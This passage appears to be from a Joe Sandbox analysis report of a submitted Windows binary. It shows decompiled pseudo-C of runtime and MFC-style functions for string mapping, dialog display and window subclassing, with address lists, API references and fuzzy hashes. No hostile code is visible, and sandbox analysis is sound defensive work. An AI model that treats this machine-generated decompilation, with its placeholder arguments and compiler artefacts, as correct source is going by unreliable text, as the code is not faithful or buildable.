							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if( *(_t192 - 0x28) != 0) {
									_push( *(_t192 - 0x28));
									E00412A4D();
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E0041AF17(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if( *(_t192 - 0x3c) != 0) {
									_push(_t183);
									E00412A4D();
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E00412260(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E00412140(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E0041AF17(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E00412247( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E00412140(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E00412BDF(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x45a740; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E00412260(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E00412A4D();
									}
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E00412A4D();
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E00412260(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										_t157 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										__eflags = _t157;
										if(_t157 != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if( *(_t192 + 0x1c) != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E00412247(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(_t160 == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E00412247(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}





























                                                                              0x00419558
                                                                              0x00419558
                                                                              0x0041955a
                                                                              0x0041955f
                                                                              0x00419566
                                                                              0x0041956c
                                                                              0x00419572
                                                                              0x00419587
                                                                              0x00419591
                                                                              0x00419597
                                                                              0x0041959a
                                                                              0x0041959c
                                                                              0x0041959c
                                                                              0x00419589
                                                                              0x00419589
                                                                              0x00419589
                                                                              0x00419587
                                                                              0x004195a9
                                                                              0x004195c6
                                                                              0x004195c6
                                                                              0x004195ce
                                                                              0x004197b0
                                                                              0x004197b3
                                                                              0x004197b5
                                                                              0x004197b8
                                                                              0x004197bb
                                                                              0x004197bd
                                                                              0x004197c2
                                                                              0x004197c2
                                                                              0x004197c5
                                                                              0x004197c8
                                                                              0x004197ca
                                                                              0x004197cf
                                                                              0x004197cf
                                                                              0x004197d5
                                                                              0x004197db
                                                                              0x004197de
                                                                              0x004197e1
                                                                              0x004197ea
                                                                              0x004197ed
                                                                              0x004198f9
                                                                              0x004198fb
                                                                              0x004198fb
                                                                              0x004198fe
                                                                              0x00419900
                                                                              0x00419903
                                                                              0x00419908
                                                                              0x00419909
                                                                              0x00000000
                                                                              0x00419909
                                                                              0x004197f3
                                                                              0x004197f4
                                                                              0x004197f5
                                                                              0x004197f8
                                                                              0x004197f9
                                                                              0x004197fc
                                                                              0x004197fd
                                                                              0x00419800
                                                                              0x00419805
                                                                              0x00419808
                                                                              0x0041980b
                                                                              0x0041980d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419821
                                                                              0x00419823
                                                                              0x00419826
                                                                              0x00419828
                                                                              0x004198d0
                                                                              0x004198d3
                                                                              0x004198d3
                                                                              0x004198d6
                                                                              0x004198d8
                                                                              0x004198d9
                                                                              0x004198de
                                                                              0x00000000
                                                                              0x004198d6
                                                                              0x0041982e
                                                                              0x00419837
                                                                              0x0041983c
                                                                              0x0041983f
                                                                              0x00419841
                                                                              0x00419847
                                                                              0x0041984c
                                                                              0x00419861
                                                                              0x00419865
                                                                              0x00419867
                                                                              0x0041988c
                                                                              0x0041989c
                                                                              0x004198a2
                                                                              0x004198a5
                                                                              0x004198a7
                                                                              0x004198ad
                                                                              0x004198b0
                                                                              0x004198b6
                                                                              0x004198b7
                                                                              0x004198b8
                                                                              0x004198bb
                                                                              0x004198be
                                                                              0x004198ca
                                                                              0x004198cc
                                                                              0x00000000
                                                                              0x004198cc
                                                                              0x00000000
                                                                              0x00419869
                                                                              0x00419872
                                                                              0x00419874
                                                                              0x00419876
                                                                              0x004198a9
                                                                              0x004198a9
                                                                              0x00000000
                                                                              0x004198a9
                                                                              0x0041987d
                                                                              0x00419882
                                                                              0x00419885
                                                                              0x00000000
                                                                              0x00419885
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004195dc
                                                                              0x004195df
                                                                              0x004197e3
                                                                              0x004197e3
                                                                              0x0041990b
                                                                              0x00419913
                                                                              0x00419913
                                                                              0x004195e5
                                                                              0x004195e7
                                                                              0x004195ea
                                                                              0x004195ed
                                                                              0x004195f3
                                                                              0x004195f5
                                                                              0x004195fa
                                                                              0x004195fa
                                                                              0x0041961e
                                                                              0x00419620
                                                                              0x00419625
                                                                              0x00000000
                                                                              0x0041962b
                                                                              0x0041962b
                                                                              0x0041963b
                                                                              0x00419640
                                                                              0x00419645
                                                                              0x00419648
                                                                              0x0041966c
                                                                              0x0041968a
                                                                              0x004196a1
                                                                              0x0041978d
                                                                              0x00419790
                                                                              0x00419792
                                                                              0x00419795
                                                                              0x0041979a
                                                                              0x0041979e
                                                                              0x004197a0
                                                                              0x004197a3
                                                                              0x004197a8
                                                                              0x004197a9
                                                                              0x00000000
                                                                              0x004197a9
                                                                              0x004196b9
                                                                              0x004196bb
                                                                              0x004196c0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004196ca
                                                                              0x004196f9
                                                                              0x00419709
                                                                              0x0041970e
                                                                              0x00419713
                                                                              0x00419716
                                                                              0x00419737
                                                                              0x0041973a
                                                                              0x00419754
                                                                              0x00419762
                                                                              0x00419768
                                                                              0x0041976a
                                                                              0x0041976c
                                                                              0x0041976d
                                                                              0x0041976e
                                                                              0x00419771
                                                                              0x00419777
                                                                              0x0041977a
                                                                              0x00419773
                                                                              0x00419773
                                                                              0x00419774
                                                                              0x00419774
                                                                              0x0041978b
                                                                              0x0041978b
                                                                              0x00000000
                                                                              0x0041973c
                                                                              0x00419740
                                                                              0x00419746
                                                                              0x00419749
                                                                              0x0041974b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041974d
                                                                              0x00000000
                                                                              0x0041974d
                                                                              0x0041973a
                                                                              0x004196cf
                                                                              0x004196ee
                                                                              0x004196ee
                                                                              0x00000000
                                                                              0x0041966e
                                                                              0x00419672
                                                                              0x00419677
                                                                              0x00419678
                                                                              0x0041967d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419683
                                                                              0x00000000
                                                                              0x00419683
                                                                              0x0041966c
                                                                              0x00419625
                                                                              0x004195ce
                                                                              0x004195ab
                                                                              0x004195ae
                                                                              0x004195b1
                                                                              0x004195b1
                                                                              0x004195b4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004195b6
                                                                              0x004195b9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004195bb
                                                                              0x00000000
                                                                              0x004195bb
                                                                              0x004195c3
                                                                              0x00000000

                                                                              APIs
                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0044BD1C,00000001,00000000,00000000,0044C648,00000038,00413616,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0041957F
                                                                              • GetLastError.KERNEL32 ref: 00419591
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,004138C3,?,00000000,00000000,0044C648,00000038,00413616,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00419618
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,004138C3,?,?,00000000), ref: 00419699
                                                                              • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004196B3
                                                                              • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 004196EE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1775797328-0
                                                                              • Opcode ID: bc7423e4d7f57eb85201f9852d825b5b2932db197b3c5f9e7c8e6ea64a485af0
                                                                              • Instruction ID: fdae1fa2379dd99bd6e8e81df66aed6633f06c6fbcf9839d33b5de006f76c102
                                                                              • Opcode Fuzzy Hash: bc7423e4d7f57eb85201f9852d825b5b2932db197b3c5f9e7c8e6ea64a485af0
                                                                              • Instruction Fuzzy Hash: F6B17B72810219EFCF119FA0DD949EE7FB5FF08314F14412AF925A22A0D7398DA1DB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00424BE6, Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E00424BE6(intOrPtr* __ecx) {
				signed int _t45;
				void* _t49;
				CHAR* _t50;
				signed int _t54;
				signed char _t60;
				struct HWND__* _t62;
				CHAR* _t63;
				signed int _t68;
				struct HINSTANCE__* _t81;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				void* _t89;

				E004128A0(E00430DC7, _t87);
				_t85 = __ecx;
				_t68 =  *(__ecx + 0x5c);
				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
				 *(_t87 - 0x18) =  *(__ecx + 0x58);
				_t45 = E0042D179();
				_t81 =  *(_t45 + 0xc);
				if( *(_t85 + 0x54) != 0) {
					_t81 =  *(E0042D179() + 0xc);
					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
					 *(_t87 - 0x18) = _t45;
				}
				if( *(_t87 - 0x18) != 0) {
					_t45 = LockResource( *(_t87 - 0x18));
					_t68 = _t45;
				}
				if(_t68 != 0) {
					 *(_t87 - 0x14) = E00424726(_t85);
					E004264AE();
					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
					__eflags =  *(_t87 - 0x14);
					if( *(_t87 - 0x14) != 0) {
						_t62 = GetDesktopWindow();
						__eflags =  *(_t87 - 0x14) - _t62;
						if( *(_t87 - 0x14) != _t62) {
							_t63 = IsWindowEnabled( *(_t87 - 0x14));
							__eflags = _t63;
							if(_t63 != 0) {
								EnableWindow( *(_t87 - 0x14), 0);
								 *(_t87 - 0x20) = 1;
							}
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
					_push(_t85);
					E004276F9();
					_t49 = E00426406(_t87,  *(_t87 - 0x14));
					_push(_t81);
					_push(_t49);
					_push(_t68);
					_t50 = E004249D9(_t85);
					__eflags = _t50;
					if(_t50 != 0) {
						__eflags =  *(_t85 + 0x38) & 0x00000010;
						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
							_t83 = 4;
							_t60 = E00428375(_t85);
							__eflags = _t60 & 0x00000001;
							if((_t60 & 0x00000001) != 0) {
								_t83 = 5;
							}
							E00425EAA(_t85, _t83);
						}
						__eflags =  *(_t85 + 0x1c);
						if( *(_t85 + 0x1c) != 0) {
							E0042856F(_t85, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					__eflags =  *(_t87 - 0x20);
					if( *(_t87 - 0x20) != 0) {
						EnableWindow( *(_t87 - 0x14), 1);
					}
					__eflags =  *(_t87 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t87 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t85 + 0x60))();
					E00424760(_t85, __eflags);
					__eflags =  *(_t85 + 0x54);
					if( *(_t85 + 0x54) != 0) {
						FreeResource( *(_t87 - 0x18));
					}
					_t54 =  *(_t85 + 0x40);
				} else {
					_t54 = _t45 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t54;
			}
















                                                                              0x00424beb
                                                                              0x00424bf5
                                                                              0x00424bfa
                                                                              0x00424bfe
                                                                              0x00424c01
                                                                              0x00424c04
                                                                              0x00424c07
                                                                              0x00424c10
                                                                              0x00424c13
                                                                              0x00424c1a
                                                                              0x00424c2b
                                                                              0x00424c31
                                                                              0x00424c31
                                                                              0x00424c38
                                                                              0x00424c3d
                                                                              0x00424c43
                                                                              0x00424c43
                                                                              0x00424c47
                                                                              0x00424c58
                                                                              0x00424c5b
                                                                              0x00424c60
                                                                              0x00424c64
                                                                              0x00424c68
                                                                              0x00424c6a
                                                                              0x00424c70
                                                                              0x00424c73
                                                                              0x00424c78
                                                                              0x00424c7e
                                                                              0x00424c80
                                                                              0x00424c87
                                                                              0x00424c8d
                                                                              0x00424c8d
                                                                              0x00424c80
                                                                              0x00424c73
                                                                              0x00424c94
                                                                              0x00424c98
                                                                              0x00424c99
                                                                              0x00424ca1
                                                                              0x00424ca6
                                                                              0x00424ca7
                                                                              0x00424ca8
                                                                              0x00424cab
                                                                              0x00424cb2
                                                                              0x00424cb4
                                                                              0x00424cb6
                                                                              0x00424cba
                                                                              0x00424cbe
                                                                              0x00424cc1
                                                                              0x00424cc6
                                                                              0x00424cc9
                                                                              0x00424ccd
                                                                              0x00424ccd
                                                                              0x00424cd1
                                                                              0x00424cd1
                                                                              0x00424cd6
                                                                              0x00424cd9
                                                                              0x00424ce7
                                                                              0x00424ce7
                                                                              0x00424cd9
                                                                              0x00424d08
                                                                              0x00424d0c
                                                                              0x00424d0f
                                                                              0x00424d16
                                                                              0x00424d16
                                                                              0x00424d1c
                                                                              0x00424d1f
                                                                              0x00424d27
                                                                              0x00424d2a
                                                                              0x00424d2f
                                                                              0x00424d2f
                                                                              0x00424d2a
                                                                              0x00424d39
                                                                              0x00424d3e
                                                                              0x00424d43
                                                                              0x00424d46
                                                                              0x00424d4b
                                                                              0x00424d4b
                                                                              0x00424d51
                                                                              0x00424c49
                                                                              0x00424c49
                                                                              0x00424c49
                                                                              0x00424d59
                                                                              0x00424d62

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00424BEB
                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00424C23
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00424C2B
                                                                                • Part of subcall function 004264AE: UnhookWindowsHookEx.USER32(?), ref: 004264D3
                                                                              • LockResource.KERNEL32(00000000,00000000), ref: 00424C3D
                                                                              • GetDesktopWindow.USER32 ref: 00424C6A
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00424C78
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00424C87
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00424D16
                                                                              • GetActiveWindow.USER32 ref: 00424D21
                                                                              • SetActiveWindow.USER32(00000000,?,00000000), ref: 00424D2F
                                                                              • FreeResource.KERNEL32(00000000,?,00000000), ref: 00424D4B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                              • String ID:
                                                                              • API String ID: 833315621-0
                                                                              • Opcode ID: 2cc216c8b614916efa65477bb684d2566cb9d05834e8a344ce78247125119191
                                                                              • Instruction ID: 6a454918f9a6f3762d5711e9aaf44d5d3c97daba61b20119071f4fbe108b7d74
                                                                              • Opcode Fuzzy Hash: 2cc216c8b614916efa65477bb684d2566cb9d05834e8a344ce78247125119191
                                                                              • Instruction Fuzzy Hash: 99419431B01725DFCB21AFA5EA4976FBBB4EF84715F50012FF102A22A1CBB85941CA5D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00427382, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 81%
                                                                              			E00427382(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t59;
				void* _t62;
				void* _t67;
				struct HWND__* _t69;
				CHAR* _t72;
				void* _t75;
				void* _t76;
				void* _t78;

				_t67 = __edx;
				_t62 = __ecx;
				E004128A0(E00430EDB, _t76);
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t78 - 0x40;
				_t72 = "AfxOldWndProc423";
				_t33 = GetPropA(_t69, _t72);
				 *(_t76 - 0x14) =  *(_t76 - 0x14) & 0x00000000;
				 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;
				 *(_t76 - 0x18) = _t33;
				_t59 = 1;
				_t35 =  *(_t76 + 0xc) - 6;
				if(_t35 == 0) {
					_t36 = E00426406(_t76,  *(_t76 + 0x14));
					E004272AB(_t62, E00426406(_t76, _t69),  *(_t76 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t59 = 0 | E0042730C(E00426406(_t76, _t69),  *(_t76 + 0x14),  *(_t76 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t59 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t69, 0xfffffffc,  *(_t76 - 0x18));
							RemovePropA(_t69, _t72);
							GlobalDeleteAtom(GlobalFindAtomA(_t72));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								 *(_t76 - 0x14) = CallWindowProcA( *(_t76 - 0x18), _t69,  *(_t76 + 0xc),  *(_t76 + 0x10),  *(_t76 + 0x14));
							} else {
								_t75 = E00426406(_t76, _t69);
								E00425A42(_t75, _t76 - 0x30, _t76 - 0x1c);
								_t54 = CallWindowProcA( *(_t76 - 0x18), _t69, 0x110,  *(_t76 + 0x10),  *(_t76 + 0x14));
								_push( *((intOrPtr*)(_t76 - 0x1c)));
								 *(_t76 - 0x14) = _t54;
								_push(_t76 - 0x30);
								_push(_t75);
								E00426952(_t67);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return  *(_t76 - 0x14);
			}

















                                                                              0x00427382
                                                                              0x00427382
                                                                              0x00427387
                                                                              0x00427392
                                                                              0x00427395
                                                                              0x00427398
                                                                              0x0042739f
                                                                              0x004273a5
                                                                              0x004273a9
                                                                              0x004273ad
                                                                              0x004273b5
                                                                              0x004273b6
                                                                              0x004273b9
                                                                              0x0042746f
                                                                              0x00427481
                                                                              0x00000000
                                                                              0x004273bf
                                                                              0x004273bf
                                                                              0x004273c2
                                                                              0x00427467
                                                                              0x00427486
                                                                              0x00427488
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004273c8
                                                                              0x004273c8
                                                                              0x004273cb
                                                                              0x0042742d
                                                                              0x00427435
                                                                              0x00427443
                                                                              0x00000000
                                                                              0x004273cd
                                                                              0x004273d2
                                                                              0x0042748a
                                                                              0x0042749d
                                                                              0x004273d8
                                                                              0x004273de
                                                                              0x004273e9
                                                                              0x004273fd
                                                                              0x00427403
                                                                              0x00427406
                                                                              0x0042740c
                                                                              0x0042740d
                                                                              0x0042740e
                                                                              0x0042740e
                                                                              0x004273d2
                                                                              0x004273cb
                                                                              0x004273c2
                                                                              0x0042741b
                                                                              0x00427424

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00427387
                                                                              • GetPropA.USER32 ref: 0042739F
                                                                              • CallWindowProcA.USER32 ref: 004273FD
                                                                                • Part of subcall function 00426952: GetWindowRect.USER32 ref: 00426977
                                                                                • Part of subcall function 00426952: GetWindow.USER32(?,00000004), ref: 00426994
                                                                              • SetWindowLongA.USER32 ref: 0042742D
                                                                              • RemovePropA.USER32 ref: 00427435
                                                                              • GlobalFindAtomA.KERNEL32 ref: 0042743C
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 00427443
                                                                                • Part of subcall function 00425A42: GetWindowRect.USER32 ref: 00425A4E
                                                                              • CallWindowProcA.USER32 ref: 00427497
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                              • String ID: AfxOldWndProc423
                                                                              • API String ID: 2397448395-1060338832
                                                                              • Opcode ID: 5205c125f3a34b7f5717aba14159f4d8c6d4550cd91e21211bbf33beee265512
                                                                              • Instruction ID: 74fd42a34dd2830671bc7576cd9b7697f62222986a732e51f69a364edfc140cf
                                                                              • Opcode Fuzzy Hash: 5205c125f3a34b7f5717aba14159f4d8c6d4550cd91e21211bbf33beee265512
                                                                              • Instruction Fuzzy Hash: EE318132A0012AABCB11AFA5EE49DBF7F78FF05310F40452AF902A2151D77C8911DB69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042F9BF, Relevance: 15.2, APIs: 10, Instructions: 181memorystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E0042F9BF(void* __ecx) {
				intOrPtr _t52;
				intOrPtr _t53;
				void* _t57;
				CHAR* _t60;
				CHAR* _t88;
				CHAR* _t89;
				void* _t102;
				CHAR* _t103;
				CHAR* _t105;
				CHAR* _t106;
				CHAR* _t107;
				void* _t111;
				short* _t112;
				void* _t122;
				void* _t127;
				void* _t129;
				void* _t131;

				_t127 = _t129 - 0x8c;
				_t52 =  *0x457184; // 0xb7aa1229
				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
				_t53 =  *0x4560dc(_t111, _t122, _t102);
				_t112 =  *((intOrPtr*)(_t127 + 0x94));
				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
				E00412140(_t112, 0, 0x20);
				_t103 =  *(_t127 + 0x98);
				_t131 = _t129 - 0x10c + 0xc;
				_t109 = _t103;
				 *(_t127 - 0x80) = _t127 - 0x78;
				if(E00428B30(_t103, 0x44b234) == 0) {
					_t109 = _t103;
					_t57 = E00428B30(_t103, 0x449b80);
					_push(0x100);
					_push(_t127 - 0x78);
					if(_t57 == 0) {
						_push(0xf108);
						E00428C25();
						 *_t112 = 0xf108;
						L12:
						_t60 = 0;
						if( *(_t127 - 0x80) == 0) {
							L14:
							__imp__#2(_t60);
							 *(_t112 + 8) = _t60;
							if( *(_t112 + 4) == 0) {
								_t106 =  *(E0042D179() + 0x10);
								if(_t106 != 0) {
									_t115 = lstrlenA(_t106) + 1;
									E00412260(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E00408F24(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
									_t112 =  *((intOrPtr*)(_t127 + 0x94));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 4) = _t60;
							}
							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
								_t105 =  *( *((intOrPtr*)(E0042D179() + 4)) + 0x60);
								if(_t105 != 0) {
									_t126 = lstrlenA(_t105) + 1;
									E00412260(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E00408F24(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
								} else {
									_t60 = 0;
								}
